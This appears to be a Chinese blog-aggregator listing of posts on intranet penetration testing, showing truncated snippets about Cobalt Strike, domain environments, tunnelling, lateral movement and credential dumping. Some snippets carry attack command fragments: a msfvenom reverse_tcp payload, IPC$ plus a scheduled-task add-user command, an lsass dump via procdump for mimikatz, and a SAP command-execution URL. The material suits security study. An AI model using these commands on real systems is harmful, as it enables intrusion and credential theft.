【内网渗透】

Cobal Strike的学习与使用

分为客户端与服务端,服务端是一个,客户端可以有多个,可被团队进行协同操作,共享攻击资源与目标信息和sessions,可模拟APT做模拟对抗,进行内网渗透
Goodric·2023-03-31 17:24

红队内网渗透神器--CobaltStrike安装教程

CobaltStrike介绍:CobaltStrike是一款渗透测试神器,被业界人称为CS神器。CobaltStrike分为客户端与服务端,服务端是一个,客户端可以有多个,可被团队进行分布式协团操作。CobaltStrike集成了端口转发、服务扫描,自动化溢出,多模式端口监听,windowsexe木马生成,windowsdll木马生成,java木马生成,office宏病毒生成,木马捆绑。钓鱼攻击包
落寞的魚丶·2023-03-31 17:53

内网渗透思路

一、整体概述1、攻击思路攻击思路主要有2种:攻击外网服务器,获取外网服务器的权限,接着利用入侵成功的外网服务器作为跳板,攻击内网其他服务器,最后获得敏感数据,并将数据传递到攻击者,看情况安装长期后门,实现长期控制和获得敏感数据的方式。攻击办公网的系统、办公网电脑、办公网无线等方式,一般是采用社工,实现控制办公电脑,再用获得的办公网数据,可能是内网的各种登录账号和密码,再获取办公网或者生产网的有用数
BTY@BTY·2023-03-31 16:19

Nginx:简介-负载均衡-正向代理-反向代理-内网穿透-网络共享-Session一致性问题

(4)内网渗透若外网服务器想访问本
weixin_49334432·2023-03-31 11:02

远控免杀专题文章(1)-基础篇

近两年随着hw和红蓝对抗的增多,接触到的提权、内网渗透、域渗透也越来越多。
Ms08067安全实验室·2023-03-31 04:59

从0开始全栈项目-01服务器搭建以及frp内网穿透搭建

今天是第一天,先在电脑上安装服务器+frp内网渗透让外网访问。vmware安装centos7安装过程不做赘述,网上到处都是。安装好官网的centos7之后首先是yum报错ce
69岁的老程序员·2023-03-30 14:20

内网渗透-基础环境

解决依赖,scope安装打开要给cmdpowershell打开远程Set-ExecutionPolicyRemoteSigned-scopeCurrentUser;我试了好多装这东西还是得科学上网,不然不好用iwr-usebget.scoop.sh|iex查看下载过的软件安装sudo安装git这里一定要配置bucketscoop添加代理scoopconfigproxy127.0.0.1:1080这
白帽小丑·2023-03-30 13:46

[网络安全提高篇] 一一九.恶意软件动态分析经典沙箱Cape的安装和基础用法详解

“网络安全提高班”新的100篇文章即将开启,包括Web渗透、内网渗透、靶场搭建、CVE复现、攻击溯源、实战及CTF总结,它将更加聚焦,更加深入,也是作者的慢慢成长史。
Eastmount·2023-03-29 20:16

[网络安全提高篇] 一二〇.恶意软件动态分析经典沙箱Cape批量提取动态API特征

“网络安全提高班”新的100篇文章即将开启,包括Web渗透、内网渗透、靶场搭建、CVE复现、攻击溯源、实战及CTF总结,它将更加聚焦,更加深入,也是作者的慢慢成长史。
Eastmount·2023-03-29 20:07

APT级全面免杀与企业纵深防御体系的红蓝对抗

一、CobaltStrike快速入门CobaltStrike:C/S架构的商业渗透软件,适合多人进行团队协作,可模拟APT做模拟对抗,进行内网渗透
wespten·2023-03-29 11:46

DAY24:信息搜集

可能在内网一个平台#甚至只有名字确定目标2、信息搜集当开始做信息收集之前,肯定是要先确定目标的,在红队项目或者HW项目中,一般目标都是一个公司的名称,然后通过这个公司的名称获取各种信息,接着开展外网打点、内网渗透等等工作
EdmunDJK·2023-03-29 08:37

流量转发之端口转发

概述在做内网渗透时,并不是说获取了shell就拥有权限了,这个时候我们要进行提权等操作,但实际上实际情况是很复杂的,有时候并不能提权成功,比如无法搞定杀软等情况,这个时候我们想要访问到内网的其他机器(不与外网相通的
烟雨醉沉浮·2023-03-28 13:24

[端口转发]lcx端口转发

0x01简介lcx是一款端口转发工具,有三个功能:第一个功能将本地端口转发到远程主机某个端口上第二个功能将本地端口转发到本地另一个端口上第三个功能是进行监听并进行转发使用这个工具以前使用的初衷是内网渗透
baguangman5501·2023-03-28 13:23

内网渗透之基础知识及环境搭建

内网渗透之基础知识一、工作组和域二、搭建内网环境内网也指局域网(LocalAreaNetwork,LAN),是指在某一区域内由多台计算机互连而成的计算机组。
世间繁华梦一出·2023-03-27 08:48

cobalt strik启动

框架而作为一个独立的平台使用,分为客户端与服务端,服务端是一个,客户端可以有多个,非常适合团队协同作战,多个攻击者可以同时连接到一个团队服务器上,共享攻击资源与目标信息和sessions,可模拟APT做模拟对抗,进行内网渗透
十三2·2023-03-27 08:47

内网渗透测试基础

内网基础知识一、什么是内网二、工作组(WORKGROUP)三、域(DOMAIN)四、域控制器(DOMAINCONTROLLERDC)五、单域六、父域和子域七、域树(Tree)八、域森林(Forest)九、域名服务器(DomainNameServer,DNS)十、活动目录(ActiveDirectory,AD)十一、安全域的划分一、什么是内网内网也指局域网,是指在某一区域内由多台计算机互连而成的计算
平凡的学者·2023-03-27 08:13

内网渗透-域管理员定位

目录Part1内网域渗透基础概念1什么是域1.权限管理比较集中,管理成本降低2.保密性加强3.安全性加强4.提高了便捷性2域渗透思路Part2域管理员定位基础Part3域管理员手动定位Part4自动化收集时常用的域管理员定位工具SPN扫描psloggedon.exePVEFindADUser.exenetview.exeName的NSE脚本PowerView.PS1脚本Part1内网域渗透基础概念
土豆.exe·2023-03-27 08:11

内网渗透的基础知识(一)

内网渗透测试基础知识(一)内网渗透是什么内网渗透(IntranetExploitation)内网渗透是指获取目标服务器控制权之后,通过内网信息收集、内网代理、权限提升、横向移动等技术,对其所处的内网环境进行渗透
一位不知名的网安小白·2023-03-27 08:33

内网渗透中域的基础知识

域基础参考链接基础内网也叫做局域网,在某一区域内由多台计算机互联成的计算机组。工作组将不同的电脑一般按功能(或部门)分别列入不同的工作组中,如技术部的技术组,行政部的行政组。这样的分组更有序加入/创建工作组右击计算机->属性->更改设置->在计算机名中输入名称->在工作组中输入名称。相当于新建了一个组,更改工作组名称就相当于更换了组退出工作组改动工作组名称即可工作组里的所有计算即都是对等的。无服务
Amire0x·2023-03-27 08:03

内网渗透基础知识(转载)

内网渗透基础知识[TOC]0x00内网概述内网也指局域网(LocalAreaNetwork,LAN)是指在某一区域内由多台计算机互联成的计算机组。一般是方圆几千米以内。
L_DC·2023-03-27 08:53

内网渗透测试:内网横向移动基础总结

内网渗透测试:内网横向移动基础总结横向移动在内网渗透中,当攻击者获取到内网某台机器的控制权后,会以被攻陷的主机为跳板,通过收集域内凭证等各种方法,访问域内其他机器,进一步扩大资产范围。
避凉闲庭·2023-03-27 08:20

内网渗透基础知识

一、内网概述内网也指局域网,是指在某一区域内又多台计算机互联成的计算机组。一般是方圆几千米内,局域网可以实现文件管理,应用软件共享,打印机共享,工作组内的历程安排,电子邮件和传真通信服务等功能。内网是封闭型的,它可以由办公室的两台计算机组成,也可以由一个公司内的上千台计算机组成。例如银行、学校、工厂等。关键词:工作组、域、域控制器(DC)、父域、子域、域树、域树林、活动目录(AD)、DMZ、域内权
十三2·2023-03-27 08:16

内网渗透神器CobaltStrike之DNS Beacon(四)

DNS隧道简介利用DNS隧道进行攻击的现象已存在多年,将数据封装在DNS协议中传输,大部分防火墙和入侵检测设备很少会过滤DNS流量,僵尸网络和入侵攻击可几乎无限制地加以利用,实现诸如远控、文件传输等操作DNS隐蔽隧道建立通讯并盗取数据,可轻易绕过传统安全产品,使用特征技术难以检测。广为人知的渗透商业软件CobaltStrike和开源软件iodine、DNScat2等亦提供了现成模块,可被快速轻易地
Henry404s·2023-03-23 14:19

内网渗透神器CobaltStrike之Beacon详解(三)

Beacon的种类HTTPBeacon和HTTPSBeacon这两个beacon的原理是通过发送http请求与受害主机通信来传达命令,以此实现控制效果优点是传输数据快,缺点时隐蔽性差,容易被防火墙或内网审计工具拦截TCPBeacon自CS4.0版本之后只有反向的TCPBeacon可用,基于TCP协议的通信方式SMBBeaconSMBBeacon使用命名管道通过父级Beacon进行通讯,当两个Bea
Henry404s·2023-03-23 14:18

网络安全工具大合集

信息收集工具(自动化利用工具、资产发现工具、目录扫描工具、子域名收集工具、指纹识别工具、端口扫描工具、各种插件....etc...)漏洞利用工具(各大CMS利用工具、中间件利用工具等项目........)内网渗透工具
网络安全-生·2023-03-22 18:10

Window环境下MySQL UDF提权

UDF提权步骤1、查看secure_file_priv的值2、查看plugin的值3、查看系统构架以及plugin目录MSF漏洞验证五、UDF提权反弹Shell六、清理痕迹七、修复建议前言本文章仅记录某次内网渗透过程中遇到的
·2023-03-22 16:24

【房间墙上凿个洞,看你在干嘛~】安全攻防内网渗透-绕过防火墙和安全检测,搭建DNS隐蔽隧道

作者:Eason_LYC悲观者预言失败,十言九中。乐观者创造奇迹,一次即可。一个人的价值,在于他所拥有的。所以可以不学无术,但不能一无所有!技术领域:WEB安全、网络攻防关注WEB安全、网络攻防。我的专栏文章知识点全面细致,逻辑清晰、结合实战,让你在学习路上事半功倍,少走弯路!个人社区:极乐世界-技术至上追求技术至上,这是我们理想中的极乐世界~(关注我即可加入社区)题目很惊悚,真的有点惊悚啊~如今
Eason_LYC·2023-03-22 12:51

当我讲起内网渗透,他们都弃我而去了

前言在内网渗透的过程中思路才是最重要的,本次内网渗透的主机虽然不多,主要还是锻炼自己内网渗透的一个思想。
顶峰相见8号·2023-03-18 14:40

MSF内网渗透系列1-生成木马

环境:攻击机:kali2020.1b靶机:win732位1.利用metasploit生成一个木马。利用msfvenom生成一个简单的windows木马命令:msfvenom-ax86--platformwindows-pwindows/meterpreter/reverse_tcpLHOST=listen_ipLPORT=listen_port-b"\x00"-ex86/shikata_ga_na
YEmooX·2023-03-17 11:29

【渗透测试笔记】之【内网渗透——应用层隧道(SSH隧道的使用:本地、远程端口转发,动态转发(内网socks代理))】

写在前面:几乎所有Linux系统都支持且默认装有SSH,如果拿下的边界服务器是Linux系统,使用ssh隧道非常方便。文章目录1实验环境2使用方法2.1常用参数2.2本地端口转发2.2.1攻击机2.2.2效果演示2.3远程端口转发2.3.1边界服务器(CentOS7)2.3.2效果演示2.4动态转发(内网代理)2.4.1攻击机2.4.2效果演示1.通过proxychains代理访问内网2.浏览器通
AA8j·2023-03-13 18:41

内网渗透之Socks代理简介

目录Socks代理简介01什么是Socks02什么是Socks代理Socks代理工具简介01EarthWorm02FRP03ProxyChains04otherSocks代理简介01什么是SocksSOCKS是一种网络传输协议,主要用于客户端与外网服务器之间通讯的中间传递。根据OSI模型,SOCKS是会话层的协议,位于表示层与传输层之间。使用TCP协议传输数据,因而不提供,如传递ICMP信息之类的
「已注销」·2023-03-13 18:28

《内网安全攻防.渗透测试实战指南》学习笔记一:内网渗透基础

前言小弟刚接触到内网渗透,该学习笔记上若有不足或错误之处,还请大佬们多多指教呀。
风居住街道0120·2023-03-12 02:30

内网渗透之横向移动:使用AnyDesk进行远程控制

u=2777606168,97769377&fm=253&fmt=auto&app=138&f=JPEG.jpeganydesk是类似teamviewer的远程管理软件,但是他不用安装且体积小【学习攻略】使用场景有云锁,护卫神等禁止3389登录时类似阿里云这种,登录3389会报警目标机器必须可以出网注意事项启动anydesk的权限需要桌面用户权限,比如,IIS做中间件的环境中,拿到了webshel
H_00c8·2023-03-11 08:30

内网渗透】Cobalt Strike搭建和使用

我们可以使用CobaltStrike进行钓鱼攻击、内网渗透等。
shatianyzg·2023-02-23 07:59

实战——红日ATT&CK系列靶场(一)

前言:在最近一年的工作中,很少能接触到内网渗透的工作,为了进一步锻炼内网渗透的能力,理清内网渗透中的思路及攻击手法,笔者打算对国内外的优秀内网靶场进行模拟实战训练,记录自己的思路以及不足处,本篇将记录对红日
book4yi·2023-02-02 09:14

绕过卡巴斯基抓lsass中的密码

0x01方法1.kill掉杀软保护的进程首先想到的就是关掉杀软的进程,但是肯定要高权限,但是之前尝试内网渗透时遇到了某数字...提权到system也并不能关掉数字的某些进程,所以觉得此处有坑,对症下药吧
ADLAB·2023-01-31 22:00

记一次命令执行到内网渗透拿下域控

文章来源:潇湘信安原文链接:https://www.xljtj.com/archives/ad.html目标站采用SAPNetWeaver是SAP的集成平台,SAP命令执行payload为网址+命令。Windows执行:http://www.test.com/ctc/servlet/ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXEC
华盟君·2023-01-28 22:23

内网渗透-信息收集

tasklist查看进程列表scktasks查看计划任务网络信息收集ipconfig/all判断是否存在域netview/domain判断是否存在域nettime/domain判断主域netstat-ano当前网络端口开放情况nslookup追踪域IP地址whoami/all用户权限netlocalgroup本地用户组netuser本地用户netuser/domain获取域用户信息netgroup
Admin3K·2023-01-28 20:55

Spring boot 项目(十二)——实现电脑网页微信扫码自动授权

基于微信公众号,单独获取登录二维码扫码,然后扫码登录,程序控制跳转逻辑,例如CSDN第二种:基于微信开放平台,跳转到微信二维码页面进行扫码登录,重定向到成功页面,例如有道笔记本文则是实现第一种授权登录前期准备内网渗透
--流星。·2023-01-27 17:40

基于Spring Boot实现电脑端网页微信扫码授权登录方式一(附带完整源码)

本地完整运行环境准备内网渗透=>
三师兄东流·2023-01-27 17:09

从外围打点到内网渗透拿下域控

0x00前言小弟不才,学了点内网知识就想练练手,社工一个fofa会员就跑了一手jboss的站,跑完之后无聊的时候就拿拿shell,看看有没有域环境熟悉下dos命令。这不,看到一个看起来比较好的站,就决定看一看他到底是何方神圣。0x01外围打点Jboss界面都不说了哈老铁们,进去看了一下jmxconsole直接秒进,真好。不过不急,war远程部署虽然可以用,jexboss集成工具岂不是更香?拿出jb
马士兵教育苹果老师·2023-01-26 10:04

内网渗透-横向移动 一

at命令使用限制是当前操作系统版本小于2012先建立一个连接netuse\\192.168.3.21\ipc$"Admin12345"/user:god.org\administrator#建立ipc连接复制添加用户的批处理脚本到域控的C盘下copyadd.bat\\192.168.30.7\c$at\\192.168.3.2115:47c:\add.bat#添加计划任务写添加账户命令的时候要注意
Admin3K·2023-01-26 03:26

【渗透测试笔记】之【内网渗透——横向渗透(1)登录认证】

目录文章目录目录拓扑图制作token散列认证IPC连接拓扑图制作token因为后续所需要进行的是内网渗透,这时候我们可以创建一个SMB的监听器,因为链接的Beacons使用Windows命名管道进行通信
AA8j·2023-01-12 18:52

内网渗透测试——搭建域环境

1.Windows域介绍域是Windows网络中独立运行的单位,域之间相互访问则需要建立信任关系。信任关系是连接在域与域之间的桥梁。当一个域与其他域建立了信任关系后,两个域之间不但可以按需要相互进行管理,还可以跨网分配文件和打印机等设备资源,使不同的域之间实现网络资源的共享与管理,以及相互通信和数据传输。在“域”模式下,至少有一台服务器负责每一台联入网络的电脑和用户的验证工作,相当于一个单位的门卫
浅*默·2023-01-09 09:42

内网渗透工具CobaltStrike使用教程详解

文章目录前言一、CobaltStrike本次实验环境二、CobaltStrike详细使用1.启动CobaltStrike2.客户端连接团队服务端3.配置监听器4.生成木马5.权限提升,命令执行以及内网横线穿透等。6.插件加载7.命令执行等操作8.目标信息总结表(自动记忆保存)10.查看主机的文件和文件夹结构信息等11.横向移动总结前言经过前期的一系列铺垫,虚拟机等一切的安装和部署,都是为了今天的这
zxl2605·2023-01-05 15:53

我的powershell免杀之路

powershell一直都是内网渗透的大热门,微软是真正的在推行PowerShell,包括Office等更多自家软件,底层都是调用
明月清风~~·2023-01-02 18:48

记一次内网渗透过程学习|天磊卫士

一、靶场说明此靶场共有3台主机Win7为双网卡,桥接为模拟外网ip(192.168.1.220),nat(192.168.52.142)模拟内网域环境,处于DMZ区域的web服务器Win2013为内网域控成员(nat:192.168.52.141)Win2018为域控主机(nat:192.168.52.138)Win2018为域控主机(nat:192.168.52.138)二、web服务器渗透信息
天磊卫士官方·2022-12-31 14:59

内网渗透Windows密码凭证获取

记录一下抓取window凭证信息的一些工具Windows凭证抓取1,procdump(官方工具无视免杀)(首选)procdump+mimikatz加载dmp文件,并导出其中的明文密码(procdump过杀软)管理员运行工具,导出为lsass.dump文件procdump.exe-accepteula-malsass.exelsass.dmp#32位系统procdump.exe-accepteula
西湖第一剑·2022-12-21 08:16

内网穿透工具---frp使用教程

前言最近在研究内网渗透的一些东西,碰到了需要内网穿透的情况,使用了几款工具后,就来总结一下啦。介绍frpfrp是一个可用于内网穿透的高性能的反向代理应用,支持tcp,udp,http,https协议。
猫星人不会笑·2022-12-20 12:09

从西北工业大学被攻击说起,谈网络安全的最后一道防线—密码

实施内网渗透并侵入关键数据服务器,非法访问一批中国境
财经科技社·2022-12-09 09:23
上一页 4 5 6 7 8 9 10 11 下一页
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他